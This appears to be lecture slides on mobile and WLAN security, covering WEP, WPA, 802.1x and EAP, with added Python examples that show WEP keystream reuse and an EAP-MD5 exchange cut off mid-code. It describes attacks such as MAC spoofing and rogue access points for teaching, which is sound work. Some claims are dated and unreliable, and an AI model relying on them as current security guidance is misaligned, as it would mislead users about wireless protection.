Lecture 3 Mobile Security

2

Content

  • IT Trends & Wireless Technology Development
  • Mobile Security Overview
  • WLAN Security
  • W-WAN Security

IT Trends & Wireless Technology Development

4

10-Year Microprocessor Speed Estimates

[Chart: billions of instructions per second (axis 0, 1, 10, 50, 100) by year, 2000 to 2010. Plotted values: 1.8, 3.6, 7.2, 14.4, 28.8, 57.6, 115. Source: The Cato Institute]

Double the speed every 18 months, following Moore's Law.

Microprocessor speeds will jump to 115 GH by 2010.

5

Optical Networking Breakthrough!

[Chart: cost per Gigabit-Mile over time. Years marked: 1984, 1993, 1994, 1998, 2000, 2002. Link capacity milestones marked: 50 Mbps, 2.5 Gbps, 320 Gbps, 1.6 Tbps.]

Both capacity increase and new economics have come together...

Moore's Law revolution

6

Eliminating downtime and the WWW (world.wide.wait)

In 2001, an estimated 2.5 billion hours were wasted downloading web pages.

Service     Uptime     Downtime
Dialtone    99.999%    5 min/year
E-mail      99.8%      18 hours/year
Web         99.0%      88 hours/year

7

Wireless versus Wired

[Chart: lines (million), axis 0 to 2000, by year 1997 to 2010; two series, Mobility and Fixed, with the Mobility series annotated as reaching 1 Billion.]

8

Colliding Worlds: Wireless and Internet

Internet
  • 20+ million hosts
  • ~175 million users
  • Users doubling every 6 months
  • 1000% annual traffic growth
  • Base of the global "networked economy"

Wireless
  • ~400 M subscribers
  • ~1 B by 2005
  • Ubiquitous services
  • Replacing wireline
  • Voice becoming a commodity
  • Advanced services

  • 75% of laptop users are also wireless voice users
  • 95% of palm-size device users are Internet users as well

Wireless + Internet + Information Mobility = Explosive Demand for Wireless Internet

9

Wireless Internet: Variety of Devices

  • Rocket eBook
  • Audible MobilePlayer
  • Diamond RIO
  • Clarion AutoPC
  • Laptop PC
  • Handheld PC
  • Personal Information Manager
  • Handset
  • Personal Communicator

10

Location Services: Traffic Cameras

11

3G Wireless service example: Video Cell phones

- Video next standard feature

Image quality degraded as these are scanned images.

12

Wireless Technologies

Personal Area Network (PAN)
  Cable-replacement technology, designed to allow devices to share their capabilities without having to use wires.
  Cell phones (Tx/Rx), PDAs (data), headsets (voice), printers.
  Will replace the IrDA port. Range is 10m – 100m. Bluetooth is NOT a LAN!

Local Area Network (LAN)
  Extension to a normal corporate LAN infrastructure; allows users to connect to the LAN via wireless 'Access Points'.
  Provides exactly the same features as a normal 'wired' connection.
  Range is 100m+.

Wide Area Network (WAN)
  CDPD, GSM, CDMA, GPRS, UMTS; TDMA (IS-136), GSM, PDC, cdmaOne, GPRS, 1xRTT, EDGE, WCDMA, cdma2000 MC.
  Provides users with 'Anywhere, Anytime' access to information. Requires a Wireless Service Provider (airtime contract, etc.).
  Currently there are no dominant standards in the US. Europe has GSM, which allowed that market to develop ahead of the US.
  Distance is unlimited.

Mobile Security Overview

14

The Increasing Amount of Mobile Malware

[Chart: number of mobile malware, axis 0 to 200, by month from 15.6.2004 to 15.2.2006.]

15

Questions of Interest

                      Research                                       Practice
Security              What motivates users to protect themselves?    How safe are users?
Location & Privacy    What constitutes “location & privacy”?         How are users being tracked?


17

Location & Privacy Practice

How many ways have you been located today?

  • When I walked by the security camera.
  • When I carry my cell phone, turned on.
  • When I put my card in the ATM machine.
  • When I scanned my ID card to enter a room.
  • When I used my laptop computer on campus.
  • When I passed by a Bluetooth-enabled printer.
  • …

18

220,000 Cell Towers Can Find You

[Image: http://www.towermaps.com/images/nationwide5.gif]

19

Millions of Wi-Fi Access Points Can Find You

[Source: http://www.cercs.gatech.edu/tech-reports/tr2006/git-cercs-06-10.pdf]


21

Location & Privacy Research

Privacy is the ability to control information about yourself. Location privacy is determined by what happens to location information:

  • Gathering
  • Storage
  • Use
  • Sharing
  • Combination

Minch, Robert P. “Privacy Issues in Location-Aware Mobile Devices.” Proceedings of the Thirty-Seventh Annual Hawaii International Conference on System Sciences (IEEE Computer Society, January 2004).

22

How Many of You Are OK With:

  • Being located when calling 911?
  • Being located by friends and family?
  • Being located by your boss?
  • Being a suspect if you drove by a convenience store while it was robbed?
  • Getting a ticket every time you speed?
  • Having your health insurance rates rise when you visit a friend in a cancer clinic?


24

Security Practice

  • Wireless security is largely a user problem
      Users must protect their own machines
      Organizations must protect against infected or malicious users
  • Many private APs are inadvertently insecure
  • Many public APs are deliberately insecure
  • Wireless (client) security means
      Firewall properly installed and configured
      Protection against malware (viruses, spyware)

25

Security Practice

  • How many of you have a wireless access point at home?
  • How many of you have it secured with a password?
  • How many of you use public hot spots at coffee shops, hotels, etc.?
  • How many of you do sensitive things like e-banking there without safeguards?

26

Security Practice On Campus

4/27/06 to 6/7/06: 3331 Boise State campus wireless users scanned
  • 287 (9%) had open ports
  • 189 of the 287 (6% of all users scanned) had at least one open port with significant security implications
  • Vulnerabilities included open ports for
      File/print sharing
      Remote desktop (remote control of your machine)
  • Evidence of malware included
      Clandestine remote control
      Keystroke logging
      Password cracking
      “Zombies” for denial of service attacks

Chenoweth, Tim; Minch, Robert; and Tabor, Sharon. “User Security Behavior on Wireless Networks: An Empirical Study.” Proceedings of the Fortieth Annual Hawaii International Conference on System Sciences (IEEE Computer Society, January 2007).


28

Security Research

Traditional models for predicting and motivating acceptance and adoption of technology emphasize achieving gains.

[Diagram: “Technology Acceptance Model”. Perceived Ease of Use and Perceived Usefulness -> Intention to Use -> Actual Use -> Effective Use]

29

Security Research

What’s needed to predict and motivate adoption of security control technology might be to emphasize avoiding problems.

[Diagram: “Protection Motivation Theory”. Severity, Vulnerability, Response Effectiveness and Self-Efficacy -> Intention -> Actual Use -> Effective Use]

WLAN Security

31

Contents

  • Wireless LAN Overview
  • Vulnerabilities
  • WEP
  • WPA
  • 802.11i
  • EAP

32

802.11 Standards

802.11: The original WLAN standard. Supports 1 Mbps to 2 Mbps.

802.11a: High-speed WLAN standard for the 5 GHz band. Supports 54 Mbps.

802.11b: WLAN standard for the 2.4 GHz band. Supports 11 Mbps.

802.11e: Addresses quality-of-service requirements for all IEEE WLAN radio interfaces.

802.11f: Defines inter-access-point communications to facilitate multi-vendor distributed WLAN networks.

802.11g: Establishes an additional modulation technique for the 2.4 GHz band. Intended to provide speeds up to 54 Mbps. Includes much greater security.

802.11h: Defines the spectrum management of the 5 GHz band for use in Europe and in Asia Pacific.

802.11i: Addresses the current security weaknesses for both authentication and encryption protocols. The standard encompasses 802.1X, TKIP, and AES protocols.

33

Vulnerabilities

34

Vulnerabilities

There are several known types of wireless attacks that must be protected against:

  • SSID (network name) sniffing
  • WEP encryption key recovery attacks
  • ARP poisoning (“man in the middle” attacks)
  • MAC address spoofing
  • Access Point management password and SNMP attacks
  • Wireless end user (station) attacks
  • Rogue AP attacks (AP impersonation)
  • DoS (denial of service) wireless attacks

35

Diversity Antenna Attacks

If diversity antennas A and B are attached to an AP, they are set up to cover the two sides of an area independently. Alice is on the left side of the area, so the AP will choose antenna A for sending and receiving her frames. Bob is on the opposite side of the area from Alice and will therefore send and receive frames with antenna B. Bob can take Alice off the network by changing his MAC address to be the same as Alice's. Bob can also guarantee that his signal is stronger on antenna B than Alice's signal on antenna A by using an amplifier or other enhancement mechanism. Once Bob's signal has been detected as the stronger signal on antenna B, the AP will send and receive frames for that MAC address on antenna B. As long as Bob continues to send traffic to the AP, Alice's frames will be ignored.

36

Malicious AP overpowering valid AP

If a client is not using WEP authentication (or an attacker has knowledge of the WEP key), then the client is vulnerable to DoS attacks from spoofed APs. Clients can generally be configured to associate with any access point or to associate to an access point in a particular ESSID.

If a client is configured to associate to any available AP, it will select the AP with the strongest signal regardless of the ESSID. If the client is configured to associate to a particular ESSID, it will select the AP in the ESSID with the strongest signal strength.

Either way, a malicious AP can effectively black-hole traffic from a victim by spoofing the desired AP.

37

Man-in-the-Middle Attacks

Man-in-the-middle (MITM) attacks have two major forms: eavesdropping and manipulation.

Eavesdropping occurs when an attacker receives a data communication stream. This is not so much a direct attack as much as it is a leaking of information. An eavesdropper can record and analyze the data that he is listening to. A manipulation attack requires the attacker to not only have the ability to receive the victim's data but then be able to retransmit the data after changing it.

38

What Exactly Is 802.1x?

  • Standard set by the IEEE 802.1 working group.
  • Describes a standard link layer protocol used for transporting higher-level authentication protocols.
  • Works between the Supplicant (client software) and the Authenticator (network device).
  • Maintains backend communication to an Authentication Server (typically RADIUS).

39

What Exactly Is 802.1x?

IEEE 802.1x is the designation of a standard titled “Port Based Network Access Control”, which indicates that the emphasis of the standard is to provide a control mechanism for connecting physically to a LAN. The standard does not define the authentication methods, but it does provide a framework that allows the standard to be applied in combination with any chosen authentication method. This adds flexibility, since current and future authentication methods can be used without having to adapt the standard.

40

What Does it Do?

  • Transports authentication information in the form of Extensible Authentication Protocol (EAP) payloads.
  • The authenticator (switch) becomes the middleman, relaying EAP received in 802.1x packets to an authentication server by using RADIUS to carry the EAP information.
  • Several EAP types are specified in the standard. Three common forms of EAP are:
      EAP-MD5 – MD5 hashed username/password
      EAP-OTP – one-time passwords
      EAP-TLS – strong PKI-authenticated Transport Layer Security (SSL)

[Frame layout: 802.1x Header | EAP Payload]

41

802.1x Components

The 802.1x standard recognizes the following concepts:

Port Access Entity (PAE): the mechanism (algorithms and protocols) associated with a LAN port (residing in either a Bridge or a Station).

Supplicant PAE: the entity that requires authentication before getting access to the LAN (typically in the client station).

Authenticator PAE: the entity facilitating authentication of a supplicant (typically in a bridge or AP).

Authentication server: the entity that provides authentication service to the Authenticators in the LAN (could be a RADIUS server).

42

802.1x Components

43

What is RADIUS?

RADIUS – The Remote Authentication Dial In User Service

  • A protocol used to communicate between a network device and an authentication server or database.
  • Allows the communication of login and authentication information (i.e. username/password, etc.) using Attribute/Value pairs (Attribute = Value).
  • Allows the communication of extended attribute/value pairs using “Vendor Specific Attributes” (VSAs).
  • Can also act as a transport for EAP messages.

[Packet layout: UDP Header | RADIUS Header | EAP Payload]

44

802.1x Call Flow

45

802.1x Call Flow

46

802.1x Traffic

As the picture indicates, EAP information, when transmitted from Supplicant to Authentication Server, is first encapsulated within a (wireless) LAN frame (referred to as EAP over LAN or EAPoL). Once received by the Authenticator it is extracted from the LAN frame and placed in a packet that conforms to the RADIUS protocol. This RADIUS packet is then transmitted to the Authentication Server using the RADIUS (UDP) protocol. Traffic coming from the Authentication Server to the Supplicant follows the reverse process.

47

802.11 Authentication

The 802.11 standard defines several services that govern how two 802.11 devices communicate. The following events must occur before an 802.11 station can communicate with an Ethernet network through a wireless access point:

1. Turn on the wireless client
2. Client listens for messages from any access points (AP) that are in range
3. Client finds a message from an AP that has a matching SSID
4. Client sends an authentication request to the AP
5. AP authenticates the station
6. Client sends an association request to the AP
7. AP associates with the station
8. Client can now communicate with the Ethernet network through the AP

48

Basic 802.11 Security

SSID (Service Set Identifier) or ESSID (Extended Service Set Identifier)

Each AP has an SSID that it uses to identify itself. Network configuration requires each wireless client to know the SSID of the AP to which it wants to connect. The SSID provides a very modest amount of control: it only keeps a client from accidentally connecting to a neighboring AP. It does not keep an attacker out.

49

SSID

SSID (Service Set Identifier) or ESSID (Extended Service Set Identifier)

The SSID is a token that identifies an 802.11 network. The SSID is a secret key that is set by the network administrator. Clients must know the SSID to join an 802.11 network; however, network sniffing can discover the SSID. The fact that the SSID is a secret key instead of a public key creates a management problem for the network administrator.

Every user of the network must configure the SSID into their system. If the network administrator seeks to lock a user out of the network, the administrator must change the SSID of the network, which requires reconfiguration of every network node. Some 802.11 NICs allow you to configure several SSIDs at one time.

50

Basic 802.11 Security

MAC filters

Some APs provide the capability for checking the MAC address of the client before allowing it to connect to the network. Using MAC filters is considered to be very weak security because with many Wi-Fi client implementations it is possible to change the MAC address by reconfiguring the card. An attacker could sniff a valid MAC address from the wireless network traffic.

51

Basic 802.11 Security

Static WEP keys

Wired Equivalent Privacy (WEP) is part of the 802.11 specification. Static WEP key operation requires keys on the client and AP that are used to encrypt data sent between them. With WEP encryption, sniffing is eliminated and session hijacking is difficult (or impossible). Client and AP are configured with a set of 4 keys, and when decrypting each is used in turn until decryption is successful. This allows keys to be changed dynamically.

Keys are the same in all clients and the AP. This means that there is a “community” key shared by everyone using the same AP. The danger is that if any one in the community is compromised, the community key, and hence the network and everyone else using it, is at risk.

52

WEP – What?

WEP (Wired Equivalent Privacy) refers to the intent to provide a privacy service to wireless LAN users similar to that provided by the physical security inherent in a wired LAN. WEP is the privacy protocol specified in IEEE 802.11 to provide wireless LAN users protection against casual eavesdropping.

53

WEP – How?

When WEP is active in a wireless LAN, each 802.11 packet is encrypted separately with an RC4 cipher stream generated by a 64-bit RC4 key. This key is composed of a 24-bit initialization vector (IV) and a 40-bit WEP key. The encrypted packet is generated with a bit-wise exclusive OR (XOR) of the original packet and the RC4 stream.

The IV is chosen by the sender and should be changed so that every packet won't be encrypted with the same cipher stream. The IV is sent in the clear with each packet. An additional 4-byte Integrity Check Value (ICV) is computed on the original packet using the CRC-32 checksum algorithm and appended to the end. The ICV (be careful not to confuse this with the IV) is also encrypted with the RC4 cipher stream.

54

WEP - Weaknesses

Key Management and Key Size

Key management is not specified in the WEP standard, and therefore is one of its weaknesses, because without interoperable key management, keys will tend to be long-lived and of poor quality.

The Initialization Vector (IV) is Too Small

WEP’s IV size of 24 bits provides for 16,777,216 different RC4 cipher streams for a given WEP key, for any key size. Remember that the RC4 cipher stream is XOR-ed with the original packet to give the encrypted packet which is transmitted, and the IV is sent in the clear with each packet.

The Integrity Check Value (ICV) algorithm is not appropriate

The WEP ICV is based on CRC-32, an algorithm for detecting noise and common errors in transmission. CRC-32 is an excellent checksum for detecting errors, but an awful choice for a cryptographic hash.
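The following Python is an added illustration, not part of the lecture slides: it implements the WEP encapsulation the “WEP – How?” slide describes (per-packet RC4 key = IV || WEP key, CRC-32 ICV appended, the whole thing XORed with the keystream, IV sent in the clear) and then quantifies the IV weakness called out above. The RC4 routine is the textbook algorithm written out so the example has no dependencies; zlib's CRC-32 stands in for the ICV computation, written little-endian as in 802.11 frames. The 5-byte key, 3-byte IV and message texts are constructed sample values.

```python
import struct
import zlib
from typing import Optional

WEP_IV_BITS = 24
WEP_IV_SPACE = 1 << WEP_IV_BITS          # 16,777,216 keystreams per WEP key


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 (key scheduling + output generation), as WEP uses it.
    Written out here only so the example runs stand-alone; RC4 is broken and
    must not be used for anything real."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encapsulate(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Per-packet RC4 key = 24-bit IV || 40-bit WEP key. ICV = CRC-32 of the
    plaintext, appended; plaintext||ICV is XORed with the keystream and the
    cleartext IV is placed in front of the ciphertext."""
    if len(wep_key) != 5 or len(iv) != 3:
        raise ValueError("64-bit WEP needs a 3-byte IV and a 5-byte key")
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    keystream = rc4_keystream(iv + wep_key, len(plaintext) + len(icv))
    return iv + xor_bytes(plaintext + icv, keystream)


def wep_decapsulate(wep_key: bytes, frame: bytes) -> Optional[bytes]:
    """Receiver side: rebuild the keystream from the cleartext IV, strip the
    ICV and verify it. Returns None when the integrity check fails."""
    iv, body = frame[:3], frame[3:]
    clear = xor_bytes(body, rc4_keystream(iv + wep_key, len(body)))
    plaintext, icv = clear[:-4], clear[-4:]
    if struct.unpack("<I", icv)[0] != (zlib.crc32(plaintext) & 0xFFFFFFFF):
        return None
    return plaintext


def seconds_until_iv_exhaustion(frames_per_second: float) -> float:
    """Even a sender that never repeats an IV early has used all 2^24 of them
    after this many seconds; for a busy AP that is hours, not years."""
    return WEP_IV_SPACE / frames_per_second


def keystream_repeats(wep_key: bytes, iv: bytes, pt1: bytes, pt2: bytes) -> bool:
    """Two frames under the same key and IV share a keystream, so XORing the
    ciphertexts cancels it and leaves the XOR of the plaintexts. True means
    the 'same cipher stream' condition the slides warn about has occurred."""
    c1 = wep_encapsulate(wep_key, iv, pt1)[3:]
    c2 = wep_encapsulate(wep_key, iv, pt2)[3:]
    n = min(len(pt1), len(pt2))
    return xor_bytes(c1[:n], c2[:n]) == xor_bytes(pt1[:n], pt2[:n])
```

Running `wep_decapsulate` on a frame with one ciphertext bit flipped returns None, because CRC-32 does catch single-bit transmission errors; that is the job it was designed for, and it is a different job from resisting a deliberate, keystream-aware modification, which is the point the ICV slide makes. `seconds_until_iv_exhaustion(500)` shows a modest 500 frames/s sender cycling through the entire IV space in about 9.3 hours.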

55

WEP - Weaknesses

WEP’s use of RC4 is weak

RC4 in its implementation in WEP has been found to have weak keys. Having a weak key means that there is more correlation between the key and the output than there should be for good security. Determining which packets were encrypted with weak keys is easy because the first three bytes of the key are taken from the IV that is sent unencrypted in each packet. This weakness can be exploited by a passive attack. All the attacker needs to do is be within a hundred feet or so of the AP.

Authentication Messages can be easily forged

802.11 defines two forms of authentication: Open System (no authentication) and Shared Key authentication.

These are used to authenticate the client to the access point. The idea was that authentication would be better than no authentication because the user has to prove knowledge of the shared WEP key, in effect authenticating himself.

56

Authentication Type: Open System Authentication

The following steps occur when two devices use Open System Authentication:

1. The station sends an authentication request to the access point.
2. The access point authenticates the station.
3. The station associates with the access point and joins the network.

The process is illustrated below.

57

Authentication Type: Shared Key Authentication

The following steps occur when two devices use Shared Key Authentication:

1. The station sends an authentication request to the access point.
2. The access point sends challenge text to the station.
3. The station uses its configured 64-bit or 128-bit default key to encrypt the challenge text, and sends the encrypted text to the access point.
4. The access point decrypts the encrypted text using its configured WEP key that corresponds to the station’s default key.
5. The access point compares the decrypted text with the original challenge text. If the decrypted text matches the original challenge text, then the access point and the station share the same WEP key and the access point authenticates the station.
6. The station connects to the network.

58

Authentication Type: Shared Key Authentication

If the decrypted text does not match the original challenge text (i.e., the access point and station do not share the same WEP key), then the access point will refuse to authenticate the station and the station will be unable to communicate with either the 802.11 network or the Ethernet network. The process is illustrated below.

59

WPA

Wi-Fi Protected Access (WPA) is a new security guideline issued by the Wi-Fi Alliance. The goal is to strengthen security over the current WEP standards by including mechanisms from the emerging 802.11i standard for both data encryption and network access control.

Path: WEP -> WPA -> 802.11i

WPA = TKIP (Temporal Key Integrity Protocol) + IEEE 802.1x

For encryption, WPA has TKIP, which uses the same encryption algorithm as WEP, but constructs keys in a different way. For access control, WPA will use the IEEE 802.1x protocol.

60

802.11i – Future Wireless Security Standard

Task group "i" within the IEEE 802.11 is responsible for developing a new standard for WLAN security to replace the weak WEP (Wired Equivalent Privacy). The IEEE 802.11i standard utilizes the authentication schemes of 802.1x and EAP (Extensible Authentication Protocol) in addition to a new encryption scheme, AES (Advanced Encryption Standard), and a dynamic key distribution scheme, TKIP (Temporal Key Integrity Protocol).

802.11i = TKIP + IEEE 802.1x + AES

61

802.11i – Future Wireless Security Standard

Temporal Key Integrity Protocol (TKIP)

The Temporal Key Integrity Protocol is part of the IEEE 802.11i encryption standard for wireless LANs. TKIP is the next generation of WEP, which is used to secure 802.11 wireless LANs. TKIP provides per-packet key mixing, a message integrity check and a re-keying mechanism, thus fixing the flaws of WEP.

62

802.11i – Future Wireless Security Standard

Advanced Encryption Standard (AES)

AES is the U.S. government's next-generation cryptography algorithm, which will replace DES and 3DES.

AES vs. Triple-DES

                                          AES                        Triple-DES
Type of algorithm                         Symmetric, block cipher    Symmetric, Feistel cipher
Key size (in bits)                        128, 192, 256              112 or 168
Speed                                     High                       Low
Time to crack (assuming a machine
could try 2^55 keys per second - NIST)    149 trillion years         4.6 billion years
Resource consumption                      Low                        Medium

63

EAP

EAP was originally designed as part of PPP (the Point-to-Point Protocol).

The PPP Extensible Authentication Protocol (EAP) is a general protocol for PPP authentication which supports multiple authentication mechanisms. It was developed in response to an increasing demand for remote access user authentication that uses other security devices.

By using EAP, support for a number of authentication schemes may be added by defining EAP types. Support might include one-time passwords, public key authentication using smart cards, certificates, and others. EAP hides the details of the authentication scheme from those network elements that need not know them.

For example, in PPP the client and the AAA server only need to know the EAP type, and the Network Access Server does not.

64

EAP

RFC 2284 defines PPP Extensible Authentication Protocol. EAP does not select a specific authentication mechanism at Link Control Phase, but rather postpones this until the Authentication Phase.

This allows the authenticator to request more information before determining the specific authentication mechanism. This also permits the use of a "back-end" server which actually implements the various mechanisms while the PPP authenticator merely passes through the authentication exchange.

65

EAP Architecture

[Diagram: EAP architecture; the only legible label is “Other EAP Types”.]

66

EAP Comparison

67

EAP Comparison

68

69

70

EAP Elements

EAP basically consists of four different protocol elements:

  • Request packets (from Authenticator [AP] to client [Supplicant])
  • Response packets (from client to Authenticator)
  • Success packet
  • Failure packet

71

EAP Message

All EAP messages have a common format:

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Code      |  Identifier   |            Length             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|    Data ...
+-+-+-+-+

Code: 1 byte, representing the type of EAP message
Identifier: 1 byte, used for matching requests and responses
Length: 2 bytes, the total message length
Data: any size, the message’s data

72

EAP Message 2

EAP request and response messages have the same format, with code=1 for requests and code=2 for responses:

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Code      |  Identifier   |            Length             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |  Type-Data ...
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Type: 1 byte, the type of authentication protocol used
Data: any size, data used for the authentication process

73

EAP Message 3

EAP Success messages are EAP messages with code 3 and no data.

A success message means that the authentication concluded successfully.

EAP failure messages are EAP messages with code 4 and no data.

A Failure message means that the authentication has failed.

74

General Description of IEEE 802.1x Terminology

[Diagram: Supplicant (operates on the client) --EAP over wireless-- Authenticator (operates on devices at the network edge, like APs and switches) --EAP over RADIUS-- Authentication Server (RADIUS server; processes EAP requests). The wireless network lies outside the enterprise edge, the enterprise network behind it.]

75

Before EAP Start

[Diagram: client --802.1X traffic (EAP over wireless)-- AP --RADIUS traffic (IP/UDP over a Layer 2 protocol, e.g. Ethernet; EAP over RADIUS)-- RADIUS server. Only authentication traffic passes; normal data is blocked.]

  • 802.11 association between client and authenticator
  • IP connection blocked by AP

The AP transfers data from 802.1x EAP messages into RADIUS messages, and vice versa.

The AP blocks the IP connection until a RADIUS Access-Accept is received.

76

802.1x Call Flow

77

EAP Flow

After the Link Establishment phase is complete, the authenticator sends one or more Requests to authenticate the peer. The Request has a type field to indicate what is being requested. Examples of Request types include Identity, MD5-challenge, One-Time Passwords, etc. Typically, the authenticator will send an initial Identity Request followed by one or more Requests for authentication information. However, an initial Identity Request is not required, and MAY be bypassed in cases where the identity is presumed (leased lines, dedicated dial-ups, etc.).

78

EAP Flow

The peer sends a Response packet in reply to each Request. As with the Request packet, the Response packet contains a type field which corresponds to the type field of the Request.The authenticator ends the authentication phase with a Success or Failure packet.

79

Generic EAP Authentication Flow

[Sequence diagram between Peer and Authenticator:]
  Authenticator -> Peer: Identity Request
  Peer -> Authenticator: Identity Response
  Authenticator -> Peer: EAP Request                                   (repeated as many times as needed)
  Peer -> Authenticator: EAP Response with the same type, or a Nak
  Authenticator -> Peer: EAP Success or EAP Failure message

If mutual authentication is required, the same sequence runs in the other direction: Identity Request / Identity Response, EAP Request / EAP Response with the same type or a Nak (repeated as needed), then EAP Success or Failure.

80

EAP Authentication

The physical connection between the client station and the network is established first, which for wireless operation means that 802.11 Association has to be completed (this is the equivalent of plugging a wired station into an Ethernet wall socket).

81

EAP Authentication

After Association the 802.1x authentication commences, initiated by the Authenticator (i.e. the AP), which sends an EAP Request to the Supplicant (i.e. the client station) asking for its credentials. These credentials could be machine name or user name, depending on the authentication method that is used.

82

EAP Authentication

The Supplicant transmits its identity information as part of an EAP response to the Authenticator, which takes the packet from the LAN frame and encapsulates it in a RADIUS protocol message for transmission to the Authentication Server.

83

EAP Authentication

At this point a sequence of exchanges will take place between the Authentication Server and the Supplicant (via the Authenticator), the exact details of which depend on the authentication method used. The ultimate result of the complete sequence is either a positive result, where the supplicant is successfully authenticated, or a negative one, where the authentication has failed. In the first case the “door” to the network is opened and all network resources are now available to the client device, while in the second case network access remains blocked.

84

EAP Authentication Methods – MD5

EAP-Message Digest 5 uses the same challenge handshake protocol as PPP-based CHAP, but the challenges and responses are sent as EAP messages.

EAP-MD5 does not support the use of per session WEP keys, or mutual authentication of Access Point and client. It also does not support encrypted links for user data, so cannot be used in an 802.11i environment.

The EAP-MD5 authentication algorithm provides one-way password based network authentication of the client.

85

EAP Authentication Methods – MD5

This algorithm can also be used for wireless applications with less stringent wireless LAN security requirements.

The advantage of using EAP-MD5 is that it is simple to administer for an operator, re-using the database of usernames and passwords which may exist currently.

The disadvantage of using EAP-MD5 in wireless LAN applications is that no encryption keys are generated. Also, while the protocol can be used by the client to authenticate the network, it is typically used only for the network to authenticate the client.

86

EAP Authentication Methods – MD5

  • A wireless station associates to its AP.
  • The AP will issue an EAP Request Identity frame to the client station.
  • The client station responds with its identity (machine name or user name).
  • The AP relays the EAP message (i.e. the client station’s identity) to the RADIUS server, to initiate the authentication services.
  • The MD5 protocol relies on a challenge text issued by the server to the client.
  • The client is to encrypt this challenge using its user password and return the result.

87

EAP Authentication Methods – MD5

  • The server will decrypt the result using the password that is recorded for the user.
  • When the results match the original, the client is validated as genuine.
  • No encryption keys are generated.
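As an added example that is not part of the lecture, the following Python ties together the “EAP Message” slides (Code / Identifier / Length header, Type byte, Success and Failure with no data), the generic EAP flow and the EAP-MD5 steps just listed. `parse_eap` checks the Length field against the actual packet before trusting the body, which is the one validation an authenticator or server must not skip. The MD5-Challenge response is computed the way RFC 3748 specifies by reference to CHAP (RFC 1994): MD5(Identifier || password || challenge), carried as Value-Size, Value, Name; the slides describe this informally as “encrypting” the challenge. The user database, identities and passwords are constructed sample values, and the `Server` and `Peer` classes are this example's own, not an implementation from the lecture or any real supplicant.

```python
import hashlib
import hmac
import os
import struct
from typing import Optional, Tuple

EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4   # Code values
TYPE_IDENTITY, TYPE_NAK, TYPE_MD5 = 1, 3, 4                        # RFC 3748 Type values
HEADER = struct.Struct("!BBH")  # Code (1), Identifier (1), Length (2), network order


def build_eap(code: int, identifier: int, type_data: bytes = b"") -> bytes:
    """Common header; Length counts the header itself. Success/Failure carry no data."""
    if code in (EAP_SUCCESS, EAP_FAILURE) and type_data:
        raise ValueError("Success/Failure messages carry no data")
    return HEADER.pack(code, identifier, HEADER.size + len(type_data)) + type_data


def parse_eap(packet: bytes) -> Tuple[int, int, Optional[int], bytes]:
    """Validate the header before using the body. Returns (code, identifier, type,
    data); type is None for Success/Failure. Bytes past Length are treated as padding."""
    if len(packet) < HEADER.size:
        raise ValueError("short EAP packet")
    code, identifier, length = HEADER.unpack_from(packet)
    if length < HEADER.size or length > len(packet):
        raise ValueError("EAP Length field inconsistent with packet size")
    body = packet[HEADER.size:length]
    if code in (EAP_SUCCESS, EAP_FAILURE):
        if body:
            raise ValueError("Success/Failure must not carry data")
        return code, identifier, None, b""
    if code in (EAP_REQUEST, EAP_RESPONSE):
        if not body:
            raise ValueError("Request/Response needs a Type byte")
        return code, identifier, body[0], body[1:]
    raise ValueError(f"unknown EAP code {code}")


def md5_challenge_value(identifier: int, password: bytes, challenge: bytes) -> bytes:
    """CHAP construction reused by EAP-MD5: MD5(Identifier || secret || challenge).
    A one-way hash, not encryption, and it yields no key material for the link."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


class Server:
    """Authentication server: owns the user database and the accept/reject decision."""

    def __init__(self, users: dict):
        self.users = users      # constructed sample: identity -> password
        self.pending = {}       # identifier -> (identity, challenge) awaiting a response

    def start(self) -> bytes:
        return build_eap(EAP_REQUEST, 1, bytes([TYPE_IDENTITY]))

    def handle(self, packet: bytes) -> bytes:
        code, ident, typ, data = parse_eap(packet)
        if code == EAP_RESPONSE and typ == TYPE_IDENTITY:
            challenge, next_id = os.urandom(16), (ident + 1) & 0xFF
            self.pending[next_id] = (data, challenge)
            type_data = bytes([TYPE_MD5, len(challenge)]) + challenge + b"example-server"
            return build_eap(EAP_REQUEST, next_id, type_data)      # Value-Size, Value, Name
        if code == EAP_RESPONSE and typ == TYPE_MD5 and ident in self.pending:
            identity, challenge = self.pending.pop(ident)          # one use per challenge
            password = self.users.get(identity)
            size, value = data[0], data[1:1 + data[0]]
            ok = (password is not None and size == 16 and
                  hmac.compare_digest(value, md5_challenge_value(ident, password, challenge)))
            return build_eap(EAP_SUCCESS if ok else EAP_FAILURE, ident)
        return build_eap(EAP_FAILURE, ident)   # Nak, unexpected type or stale identifier


class Peer:
    """Supplicant: answers Identity and MD5-Challenge requests, Naks anything else."""

    def __init__(self, identity: bytes, password: bytes):
        self.identity, self.password = identity, password

    def handle(self, packet: bytes) -> Optional[bytes]:
        code, ident, typ, data = parse_eap(packet)
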